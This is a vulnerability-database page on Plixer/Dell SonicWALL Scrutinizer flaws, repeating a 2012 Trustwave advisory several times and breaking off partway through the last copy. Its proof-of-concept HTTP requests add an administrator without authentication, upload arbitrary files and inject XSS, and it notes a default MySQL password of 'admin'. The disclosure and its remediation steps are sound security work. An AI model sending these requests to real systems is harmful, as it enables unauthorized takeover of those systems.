VARIoT IoT vulnerabilities database
| VAR-201207-0529 | CVE-2012-2627 | Plixer Scrutinizer (Dell SonicWALL Scrutinizer) Vulnerable to creating or overwriting arbitrary files |
CVSS V2: 9.4 CVSS V3: - Severity: HIGH |
d4d/uploader.php in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allows remote attackers to create or overwrite arbitrary files in %PROGRAMFILES%\Scrutinizer\snmp\mibs\ via a multipart/form-data POST request. Scrutinizer is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
Scrutinizer 9.5.0 is vulnerable; other versions may also be affected. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting. Trustwave SpiderLabs Security Advisory TWSL2012-014:
Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer
Published: 07/27/12
Version: 1.0
Vendor: Plixer International (http://www.plixer.com)
Product: Scrutinizer NetFlow and sFlow Analyzer
Version affected: Confirmed 9.0.1 (Build 9.0.1.19899) and prior versions
may be affected as well. Please note that the software can be found in a
long list of other products. Visit http://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html
for the partial list.
Product description:
Network analysis tool for monitoring the overall network health and reports
on which hosts, applications, protocols, etc. that are consuming network
bandwidth.
Credits:
Mario Ceballos of the Metasploit Project
Jonathan Claudius of Trustwave Spiderlabs
Finding 1: HTTP Authentication Bypass Vulnerability
CVE: CVE-2012-2626
The Scrutinizer web console provides a form-based login facility, requiring
users to authenticate to gain access to further functionality. A tiered
user access model is also used, where administrative and standard users
have a different selection of permissible functions. Authentication and
authorization is controlled by the cookie-based session management system.
Although this is implemented in a standardized way, the session tokens are
not required to perform privileged functions, such as adding users.
Example(s):
This request will add a user named "trustwave" with the password of
"trustwave" to the administrative user group.
#Request
POST /cgi-bin/admin.cgi HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: 70
tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:52:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 19
Content-Type: text/html; charset=utf-8
{"new_user_id":"2"}
Finding 2: Arbitrary File Upload Vulnerability
CVE: CVE-2012-2627
The Scrutinizer web console is prone to unauthenticated arbitrary file upload
vulnerability.
Example(s):
This request will upload a test file to the following location:
'C:\Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt'
Note: This affected folder also contains SNMP configuration files which could
be overwritten if an attacker were to select the right file name.
#Request
POST /d4d/uploader.php HTTP/1.0
Host: A.B.C.D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593
Content-Length: 210
--_Part_949_3365333252_3066945593
Content-Disposition: form-data;
name="uploadedfile"; filename="trustwave.txt"
Content-Type: application/octet-stream
trustwave
--_Part_949_3365333252_3066945593--
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:39:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 41
Connection: close
Content-Type: text/html
{"success":1,"file_name":"trustwave.txt"}
#Confirming on File System
C:\>type "Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt"
trustwave
Finding 3: Multiple Cross-site Scripting Vulnerabilities in exporters.php and contextMenu.php
CVE: CVE-2012-3848
The Scrutinizer web console suffers from multiple Cross Site Scripting
vulnerabilities in the following pages:
1.) /d4d/contextMenu.php
2.) /d4d/exporters.php
These vulnerabilities include the following:
1.) XSS via arbitrary parameter
3.) XSS via referrer header
Example(s):
The following two examples will demonstrate the the above mentioned vulnerabilities on exporters.php
#Request 1
GET /d4d/exporters.php?a<script>alert(123)</script>=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
#Response 1
<snip>
<a href="/d4d/exporters.php?a<script>alert(1)</script>=1">/d4d/exporters.php?a<script>alert(123)</script>=1</a></td></tr>
<snip>
#Request 2
GET /d4d/exporters.php HTTP/1.1
Host: A.B.C.D
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1
Content-Length: 2
#Response 2
<snip>
<a href="http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1">http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1</a>
<snip>
Finding 4: Undocumented Default Admin MySQL Users
CVE: CVE-2012-3951
The Scrutinizer application relies on an underlying Apache, MySQL and PHP
installation which is installed as part of the scrutinizer installer
package. The installation of these packages are transparent to the user
during the Scrutinizer installation.
The installation selects default passwords for internal MySQL Users which
are not configured by the user which could be easily guessed by an
attacker. There is currently no way to change these values within the
Scrutinizer application and changing them manually in the MySQL instance
has unknown effects on the application due to hardcoded values for some of
these accounts.
Example(s):
The following MySQL command can be run to see the users and their relative
passwords:
#Request
select User,Password from mysql.user;
#Response
User |Password
root |
root |
scrutinizer |*4ACFE3202A5FF5CF467898FC58AAB1D615029441
scrutremote |*4ACFE3202A5FF5CF467898FC58AAB1D615029441
Note 1: the above hash shared between the 'scrutinizer' and 'scrutremote'
users is equivalent to 'admin'
Note 2: the 'scrutinizer' and 'scrutremote' users have select, update,
delete, create, drop, and more permissions within the MySQL instance.
Note 3: By default, the MySQL instance is bound to "0.0.0.0", the
equivalent of every network interface on the system allowing users with the
proper access rights to interact directly with the MySQL instance.
Remediation Steps:
Customers should update to the latest version of Scrutinizer NetFlow &
sFlow Analyzer in order to address findings 1, 2 and 3. These issues have been
corrected in version 9.5.0.
Revision History:
05/02/12 - Vulnerability disclosed
05/16/12 - Patch released by vendor
07/11/12 - Vendor publishes announcement
07/27/12 - Advisory published
References
1. http://www.plixer.com
2. http://blog.spiderlabs.com
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format
| VAR-201207-0528 | CVE-2012-2626 | Plixer Scrutinizer (Dell SonicWALL Scrutinizer) Vulnerabilities in adding administrator accounts |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
cgi-bin/admin.cgi in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 does not require token authentication, which allows remote attackers to add administrative accounts via a userprefs action. Scrutinizer is prone to an authentication-bypass vulnerability.
Exploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions.
Scrutinizer 9.5.0 is vulnerable; other versions may also be affected. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting. A remote attacker could exploit this vulnerability to add an administrative account through the manipulation of user preferences. Trustwave SpiderLabs Security Advisory TWSL2012-014:
Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer
Published: 07/27/12
Version: 1.0
Vendor: Plixer International (http://www.plixer.com)
Product: Scrutinizer NetFlow and sFlow Analyzer
Version affected: Confirmed 9.0.1 (Build 9.0.1.19899) and prior versions
may be affected as well. Please note that the software can be found in a
long list of other products. Visit http://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html
for the partial list.
Product description:
Network analysis tool for monitoring the overall network health and reports
on which hosts, applications, protocols, etc. that are consuming network
bandwidth.
Credits:
Mario Ceballos of the Metasploit Project
Jonathan Claudius of Trustwave Spiderlabs
Finding 1: HTTP Authentication Bypass Vulnerability
CVE: CVE-2012-2626
The Scrutinizer web console provides a form-based login facility, requiring
users to authenticate to gain access to further functionality. A tiered
user access model is also used, where administrative and standard users
have a different selection of permissible functions. Authentication and
authorization is controlled by the cookie-based session management system.
Although this is implemented in a standardized way, the session tokens are
not required to perform privileged functions, such as adding users.
Example(s):
This request will add a user named "trustwave" with the password of
"trustwave" to the administrative user group.
#Request
POST /cgi-bin/admin.cgi HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: 70
tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:52:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 19
Content-Type: text/html; charset=utf-8
{"new_user_id":"2"}
Finding 2: Arbitrary File Upload Vulnerability
CVE: CVE-2012-2627
The Scrutinizer web console is prone to unauthenticated arbitrary file upload
vulnerability. An attacker could exploit this vulnerability to upload files
to the affected systems file system as well as overwrite the Scrutinizer
applications SNMP configuration.
Example(s):
This request will upload a test file to the following location:
'C:\Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt'
Note: This affected folder also contains SNMP configuration files which could
be overwritten if an attacker were to select the right file name.
#Request
POST /d4d/uploader.php HTTP/1.0
Host: A.B.C.D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593
Content-Length: 210
--_Part_949_3365333252_3066945593
Content-Disposition: form-data;
name="uploadedfile"; filename="trustwave.txt"
Content-Type: application/octet-stream
trustwave
--_Part_949_3365333252_3066945593--
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:39:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 41
Connection: close
Content-Type: text/html
{"success":1,"file_name":"trustwave.txt"}
#Confirming on File System
C:\>type "Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt"
trustwave
Finding 3: Multiple Cross-site Scripting Vulnerabilities in exporters.php and contextMenu.php
CVE: CVE-2012-3848
The Scrutinizer web console suffers from multiple Cross Site Scripting
vulnerabilities in the following pages:
1.) /d4d/contextMenu.php
2.) /d4d/exporters.php
These vulnerabilities include the following:
1.) XSS via arbitrary parameter
3.) XSS via referrer header
Example(s):
The following two examples will demonstrate the the above mentioned vulnerabilities on exporters.php
#Request 1
GET /d4d/exporters.php?a<script>alert(123)</script>=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
#Response 1
<snip>
<a href="/d4d/exporters.php?a<script>alert(1)</script>=1">/d4d/exporters.php?a<script>alert(123)</script>=1</a></td></tr>
<snip>
#Request 2
GET /d4d/exporters.php HTTP/1.1
Host: A.B.C.D
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1
Content-Length: 2
#Response 2
<snip>
<a href="http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1">http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1</a>
<snip>
Finding 4: Undocumented Default Admin MySQL Users
CVE: CVE-2012-3951
The Scrutinizer application relies on an underlying Apache, MySQL and PHP
installation which is installed as part of the scrutinizer installer
package. The installation of these packages are transparent to the user
during the Scrutinizer installation.
The installation selects default passwords for internal MySQL Users which
are not configured by the user which could be easily guessed by an
attacker. There is currently no way to change these values within the
Scrutinizer application and changing them manually in the MySQL instance
has unknown effects on the application due to hardcoded values for some of
these accounts.
Example(s):
The following MySQL command can be run to see the users and their relative
passwords:
#Request
select User,Password from mysql.user;
#Response
User |Password
root |
root |
scrutinizer |*4ACFE3202A5FF5CF467898FC58AAB1D615029441
scrutremote |*4ACFE3202A5FF5CF467898FC58AAB1D615029441
Note 1: the above hash shared between the 'scrutinizer' and 'scrutremote'
users is equivalent to 'admin'
Note 2: the 'scrutinizer' and 'scrutremote' users have select, update,
delete, create, drop, and more permissions within the MySQL instance.
Note 3: By default, the MySQL instance is bound to "0.0.0.0", the
equivalent of every network interface on the system allowing users with the
proper access rights to interact directly with the MySQL instance.
Remediation Steps:
Customers should update to the latest version of Scrutinizer NetFlow &
sFlow Analyzer in order to address findings 1, 2 and 3. These issues have been
corrected in version 9.5.0.
Revision History:
05/02/12 - Vulnerability disclosed
05/16/12 - Patch released by vendor
07/11/12 - Vendor publishes announcement
07/27/12 - Advisory published
References
1. http://www.plixer.com
2. http://blog.spiderlabs.com
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format
| VAR-201207-0303 | CVE-2012-3951 | Plixer Scrutinizer (Dell SonicWALL Scrutinizer) In any SQL Command execution vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
The MySQL component in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) 9.0.1.19899 and earlier has a default password of admin for the (1) scrutinizer and (2) scrutremote accounts, which allows remote attackers to execute arbitrary SQL commands via a TCP session. Scrutinizer is prone to a security-bypass vulnerability.
Successful attacks can allow an attacker to gain access to the affected application using the default authentication credentials.
Scrutinizer 9.5.0 is vulnerable; other versions may also be affected. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting. Trustwave SpiderLabs Security Advisory TWSL2012-014:
Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer
Published: 07/27/12
Version: 1.0
Vendor: Plixer International (http://www.plixer.com)
Product: Scrutinizer NetFlow and sFlow Analyzer
Version affected: Confirmed 9.0.1 (Build 9.0.1.19899) and prior versions
may be affected as well. Please note that the software can be found in a
long list of other products. Visit http://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html
for the partial list.
Product description:
Network analysis tool for monitoring the overall network health and reports
on which hosts, applications, protocols, etc. that are consuming network
bandwidth.
Credits:
Mario Ceballos of the Metasploit Project
Jonathan Claudius of Trustwave Spiderlabs
Finding 1: HTTP Authentication Bypass Vulnerability
CVE: CVE-2012-2626
The Scrutinizer web console provides a form-based login facility, requiring
users to authenticate to gain access to further functionality. A tiered
user access model is also used, where administrative and standard users
have a different selection of permissible functions. Authentication and
authorization is controlled by the cookie-based session management system.
Although this is implemented in a standardized way, the session tokens are
not required to perform privileged functions, such as adding users.
Example(s):
This request will add a user named "trustwave" with the password of
"trustwave" to the administrative user group.
#Request
POST /cgi-bin/admin.cgi HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: 70
tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:52:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 19
Content-Type: text/html; charset=utf-8
{"new_user_id":"2"}
Finding 2: Arbitrary File Upload Vulnerability
CVE: CVE-2012-2627
The Scrutinizer web console is prone to unauthenticated arbitrary file upload
vulnerability. An attacker could exploit this vulnerability to upload files
to the affected systems file system as well as overwrite the Scrutinizer
applications SNMP configuration.
Example(s):
This request will upload a test file to the following location:
'C:\Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt'
Note: This affected folder also contains SNMP configuration files which could
be overwritten if an attacker were to select the right file name.
#Request
POST /d4d/uploader.php HTTP/1.0
Host: A.B.C.D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593
Content-Length: 210
--_Part_949_3365333252_3066945593
Content-Disposition: form-data;
name="uploadedfile"; filename="trustwave.txt"
Content-Type: application/octet-stream
trustwave
--_Part_949_3365333252_3066945593--
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:39:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 41
Connection: close
Content-Type: text/html
{"success":1,"file_name":"trustwave.txt"}
#Confirming on File System
C:\>type "Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt"
trustwave
Finding 3: Multiple Cross-site Scripting Vulnerabilities in exporters.php and contextMenu.php
CVE: CVE-2012-3848
The Scrutinizer web console suffers from multiple Cross Site Scripting
vulnerabilities in the following pages:
1.) /d4d/contextMenu.php
2.) /d4d/exporters.php
These vulnerabilities include the following:
1.) XSS via arbitrary parameter
3.) XSS via referrer header
Example(s):
The following two examples will demonstrate the the above mentioned vulnerabilities on exporters.php
#Request 1
GET /d4d/exporters.php?a<script>alert(123)</script>=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
#Response 1
<snip>
<a href="/d4d/exporters.php?a<script>alert(1)</script>=1">/d4d/exporters.php?a<script>alert(123)</script>=1</a></td></tr>
<snip>
#Request 2
GET /d4d/exporters.php HTTP/1.1
Host: A.B.C.D
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1
Content-Length: 2
#Response 2
<snip>
<a href="http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1">http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1</a>
<snip>
Finding 4: Undocumented Default Admin MySQL Users
CVE: CVE-2012-3951
The Scrutinizer application relies on an underlying Apache, MySQL and PHP
installation which is installed as part of the scrutinizer installer
package. The installation of these packages are transparent to the user
during the Scrutinizer installation.
The installation selects default passwords for internal MySQL Users which
are not configured by the user which could be easily guessed by an
attacker. There is currently no way to change these values within the
Scrutinizer application and changing them manually in the MySQL instance
has unknown effects on the application due to hardcoded values for some of
these accounts.
Example(s):
The following MySQL command can be run to see the users and their relative
passwords:
#Request
select User,Password from mysql.user;
#Response
User |Password
root |
root |
scrutinizer |*4ACFE3202A5FF5CF467898FC58AAB1D615029441
scrutremote |*4ACFE3202A5FF5CF467898FC58AAB1D615029441
Note 1: the above hash shared between the 'scrutinizer' and 'scrutremote'
users is equivalent to 'admin'
Note 2: the 'scrutinizer' and 'scrutremote' users have select, update,
delete, create, drop, and more permissions within the MySQL instance.
Note 3: By default, the MySQL instance is bound to "0.0.0.0", the
equivalent of every network interface on the system allowing users with the
proper access rights to interact directly with the MySQL instance.
Remediation Steps:
Customers should update to the latest version of Scrutinizer NetFlow &
sFlow Analyzer in order to address findings 1, 2 and 3. These issues have been
corrected in version 9.5.0.
Revision History:
05/02/12 - Vulnerability disclosed
05/16/12 - Patch released by vendor
07/11/12 - Vendor publishes announcement
07/27/12 - Advisory published
References
1. http://www.plixer.com
2. http://blog.spiderlabs.com
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format
| VAR-201207-0300 | CVE-2012-3848 | Plixer Scrutinizer (Dell SonicWALL Scrutinizer) Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to d4d/exporters.php, (2) the HTTP Referer header to d4d/exporters.php, or (3) unspecified input to d4d/contextMenu.php. (1) d4d/exporters.php Query string for (2) d4d/exporters.php To HTTP Referer header (3) d4d/contextMenu.php Unspecified input to. Scrutinizer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Scrutinizer 9.5.0 is vulnerable; other versions may also be affected. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting. Trustwave SpiderLabs Security Advisory TWSL2012-014:
Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer
Published: 07/27/12
Version: 1.0
Vendor: Plixer International (http://www.plixer.com)
Product: Scrutinizer NetFlow and sFlow Analyzer
Version affected: Confirmed 9.0.1 (Build 9.0.1.19899) and prior versions
may be affected as well. Please note that the software can be found in a
long list of other products. Visit http://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html
for the partial list.
Product description:
Network analysis tool for monitoring the overall network health and reports
on which hosts, applications, protocols, etc. that are consuming network
bandwidth.
Credits:
Mario Ceballos of the Metasploit Project
Jonathan Claudius of Trustwave Spiderlabs
Finding 1: HTTP Authentication Bypass Vulnerability
CVE: CVE-2012-2626
The Scrutinizer web console provides a form-based login facility, requiring
users to authenticate to gain access to further functionality. A tiered
user access model is also used, where administrative and standard users
have a different selection of permissible functions. Authentication and
authorization is controlled by the cookie-based session management system.
Although this is implemented in a standardized way, the session tokens are
not required to perform privileged functions, such as adding users.
Example(s):
This request will add a user named "trustwave" with the password of
"trustwave" to the administrative user group.
#Request
POST /cgi-bin/admin.cgi HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: 70
tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:52:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 19
Content-Type: text/html; charset=utf-8
{"new_user_id":"2"}
Finding 2: Arbitrary File Upload Vulnerability
CVE: CVE-2012-2627
The Scrutinizer web console is prone to unauthenticated arbitrary file upload
vulnerability. An attacker could exploit this vulnerability to upload files
to the affected systems file system as well as overwrite the Scrutinizer
applications SNMP configuration.
Example(s):
This request will upload a test file to the following location:
'C:\Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt'
Note: This affected folder also contains SNMP configuration files which could
be overwritten if an attacker were to select the right file name.
#Request
POST /d4d/uploader.php HTTP/1.0
Host: A.B.C.D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593
Content-Length: 210
--_Part_949_3365333252_3066945593
Content-Disposition: form-data;
name="uploadedfile"; filename="trustwave.txt"
Content-Type: application/octet-stream
trustwave
--_Part_949_3365333252_3066945593--
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:39:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 41
Connection: close
Content-Type: text/html
{"success":1,"file_name":"trustwave.txt"}
#Confirming on File System
C:\>type "Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt"
trustwave
Finding 3: Multiple Cross-site Scripting Vulnerabilities in exporters.php and contextMenu.php
CVE: CVE-2012-3848
The Scrutinizer web console suffers from multiple Cross Site Scripting
vulnerabilities in the following pages:
1.) /d4d/contextMenu.php
2.) /d4d/exporters.php
These vulnerabilities include the following:
1.) XSS via arbitrary parameter
3.) XSS via referrer header
Example(s):
The following two examples will demonstrate the the above mentioned vulnerabilities on exporters.php
#Request 1
GET /d4d/exporters.php?a<script>alert(123)</script>=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
#Response 1
<snip>
<a href="/d4d/exporters.php?a<script>alert(1)</script>=1">/d4d/exporters.php?a<script>alert(123)</script>=1</a></td></tr>
<snip>
#Request 2
GET /d4d/exporters.php HTTP/1.1
Host: A.B.C.D
Accept: */*
